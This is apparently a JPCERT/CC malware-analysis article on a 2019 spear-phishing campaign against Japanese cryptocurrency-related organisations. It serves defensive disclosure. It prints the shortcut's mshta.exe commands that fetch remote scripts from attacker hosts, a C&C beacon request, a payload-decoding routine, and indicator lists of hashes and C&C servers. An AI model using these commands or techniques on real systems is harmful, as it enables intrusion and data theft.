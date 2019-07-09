As of June 2019, JPCERT/CC has observed targeted emails to some Japanese organisations. These emails contain a URL to a cloud service and convince recipients to download a zip file which contains a malicious shortcut file. This article will describe the details of the attack method.

How the VBScript downloader is launched

The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file “Password.txt.lnk”. This shortcut file contains some commands, and they run when the file is executed. The below image illustrates the flow of events from the shortcut file being executed until the VBScript-based downloader is launched. Figure 1： Flow of events from running the shortcut file to infecting a host

The shortcut file contains the following command:

C:\Windows\System32\mshta.exe https://bit.ly/31O88c3

When a user accesses the shortened URL, they will be redirected to the following site, and an HTML file containing the VBScript (Figure 2) is downloaded.

http://service.amzonnews.club:8080/open?id=3F%2BE7HwXzwMRiysADDAgev15bAPluuPYB%2BufUnqYMCw%3D

Figure 2： HTML file downloaded by the shortcut file

The behaviour of the VBScript is described in Figure 3. First, it creates and displays a text file that contains the password for the decoy document. Then, it creates a VBS file (oezjrjua.vbs) in %TEMP% directory and executes it. It also lists the processes running in the environment and checks whether any of them contains specific strings ("hudongf" or "qhsafe"). If these are not included, then a shortcut file (xBoxOne.lnk) is created in the Startup folder. It is assumed that this process is meant to check strings that Qihoo 360 security products contain (zhudongfangyu.exe, qhsafemain.exe).

Figure 3： Behaviour of VBScript in the HTML file

Details of xBoxOne.lnk

xBoxOne.lnk is a shortcut file and contains the following command:

C:\Windows\System32\mshta.exe https://bit.ly/2SGs76y

When a user accesses the shortened URL, they will be redirected to the following site:

http://update.gdrives.top:8080/open?id=b7hMO0D%2ByNbNZSqXu4Putub%2BZLLqg/S66Foz0YKUjety914cQmWz32MV6BE44pEd

This shortcut file is created in the Startup folder and executed when the login is processed. As of 26 June 2019, JPCERT/CC was not able to confirm the details of the site as the hostname could not be resolved.

Details of oezjrjua.vbs

oezjrjua.vbs is a downloader which sends a POST request every 3 minutes and executes the received data as VBScript. The following is an example.

POST /open?topics=s9[random 3-digit numeric] HTTP/1.1 Accept: */* Accept-Language: ja UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 75.133.9.84:8080 Content-Length: 7426 Connection: Keep-Alive Cache-Control: no-cache 200

Details of VBScript downloaded by oezjrjua.vbs

JPCERT/CC has confirmed that the VBScript (Figure 4) is received and executed in response to the POST request from oezjrjua.vbs.

Figure 4：VBScript executed by oezjrjua.vbs (snipped)

The executed VBScript collects information of the infected device and sends it to the attacker’s server every minute. The following information is sent:

Username

Host name

OS version

OS install date

OS run time

Time zone

CPU name

Execution path of oezjrjua.vbs

Network adapter information

List of running processes

If the response to the data contains “20”, encoded data will be downloaded. It can be decoded with the following codes:

n=InStr(1,res,"#") // Finds # in the response key=CLng("&h" & Mid(res,1,n-1)) // Extract the key psc=Mid(ret,n+1,Len(res)-n) // Extracts encoded data sc=base64dec(psc) // Base64 decoding (1st time) psc=CStr(xor(sc,key)) // XOR processing on the key NStep=base64dec(psc) // Base64 decoding (2nd time)

The decoded data is expected to be VBScript, and it will be executed when it is correctly decoded. As of now, we have no clue about what kind of malware will be downloaded as a result since the encoded data is not accessible. It is assumed that attackers would inject some malicious files according to the victim’s environmental information .

Access to the shortened URL

JPCERT/CC observed a limited number of access to the shortened URL (Figure 5). This implies that the attack was conducted against a very limited range of targets.

Figure 5： Access counts to the shortened URL (snipped)

In closing

In this series of attacks, we have observed that attackers change some parts of encoding and conditions for each attempt. It is likely that this type of attack continues with some customisation. Details about the shortcut file is available in Appendix A, list of samples in Appendix B and C&C servers in Appendix C.

The hash values and C&C servers of some variants are listed in Appendix D and E . Please make sure that none of your devices is communicating to the C&C servers listed in Appendix C or E. These samples were mostly decoy documents with subjects about cryptocurrency. We are aware that some of these documents have been sent to organisations that are related to cryptocurrencies. We assume that this attack campaign specifically targets cryptocurrency operators and related entities.

Tomoaki Tani

(Translated by Yukako Uchida)

Appendix A Shortcut file information

Table 1: Information contained in the shortcut file 1 Drive serial number fe42-66e0 NetBIOS name desktop-6hpdfg4 MAC address 94:b8:6d:42:68:1d

Table 2: Information contained in the shortcut file 2 Drive serial number 1aee-e0bd NetBIOS name desktop-m9r59ro MAC address 74:27:ea:25:d6:11

Appendix B SHA-256 Hash value of the samples

71346d2cb7ecf45d7fe221ede76da51a2ecb85110b9b27f1cb64c30f9af69250

01b5cd525d18e28177924d8a7805c2010de6842b8ef430f29ed32b3e5d7d99a0

10ce173cfe83321b44139e3d7d20c5ac1a9c1c99882387af0fdbadcfa2597651

dc5f81c5bf0f5905ff2b6bdc4e1171fc41ad736da265801a64bb821bd76eace9

9ad472872ba20c66fad56b7340ae869ff4d6708a2d0fc275a0faaded6ab7b507

de7fde10fabf91c03cdd894e40a19e664a9f9866932a801e57f1b79088847ebd

4ecab0f81a2da70df5f2260bab7c8c130b200dbfe2bbd8e3d1845ff0c93c7861

e982a70cb21c915d847925bd364d6d87f02eac135eac3ba80ad448700e1ae9a7

Appendix C List of C&C servers

service.amzonnews.club

75.133.9.84

update.gdrives.top

googledrive.network

Appendix D SHA-256 Hash value of the similar samples

901eca85c5711a53e53c48309b3afd34cbb014c91a20f8f716ee21832c7cd5e0

c60aedbb20fdea048fa2d4b3bdc520f9f9b9172ee16c01dac19b33781b1bdb1d

7446efa798cfa7908e78e7fb2bf3ac57486be4d2edea8a798683c949d504dee6

1533374acf886bc3015c4cba3da1c67e67111c22d00a8bbf7694c5394b91b9fc

b077edc8d08796cdff8b75e5cb66e0191510a559941b431e38040e51b6607876

997c4f7695a6a615da069d5f839582fdb83f215bc999e8af492636b2b5e3436c

a464781b616c86bbd68dbf909826444f7fd6c6ae378caf074926df7aebc4e3a1

Appendix E C&C servers of the similar samples